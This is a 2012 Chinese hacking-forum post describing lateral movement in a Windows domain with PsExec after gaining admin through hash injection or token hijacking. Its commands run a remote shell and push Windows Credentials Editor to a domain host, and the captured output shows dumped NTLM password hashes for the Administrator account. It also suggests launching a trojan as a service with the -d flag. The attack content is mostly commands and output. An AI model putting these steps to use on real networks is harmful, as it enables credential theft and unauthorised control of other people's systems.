切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
153 HASH攻击 psexec.exe[复制链接]
发表于 2012-9-11 01:17:09 | 显示全部楼层 |!read_mode!

参考 http://baike.baidu.com/view/555225.htm
下载: http://download.sysinternals.com/files/PSTools.zip /完整包

方便域管理,首先你得是域管理 你可以通过HASH注入或者令牌劫持

运行远程文件
  1. C:\hash\PSTools>PsExec.exe \\dis9team-domain  cmd.exe
复制代码



远程运行本地文件

本地的c:\hash\wce\wce.exe


  1. C:\hash\PSTools>PsExec.exe \\dis9team-domain  -c c:\hash\wce\wce.exe -l

  2. PsExec v1.98 - Execute processes remotely
  3. Copyright (C) 2001-2010 Mark Russinovich
  4. Sysinternals - www.sysinternals.com


  5. WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security -
  6. by Hernan Ochoa (hernan@ampliasecurity.com)
  7. Use -h for help.

  8. DIS9TEAM-DOMAIN$:DIS9:00000000000000000000000000000000:15240D09AD089CEE3B6F6E084
  9. B62C765
  10. Administrator:DIS9:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA885473768
  11. 18D4
  12. wce.exe exited on dis9team-domain with error code 0.

  13. C:\hash\PSTools>
复制代码
如果是木马在后面加个-d,以服务的方式运气


  1. C:\hash\PSTools>psexec \\dis9team-domain -i -d -s c:\windows\regedit.exe
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-25 09:02

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部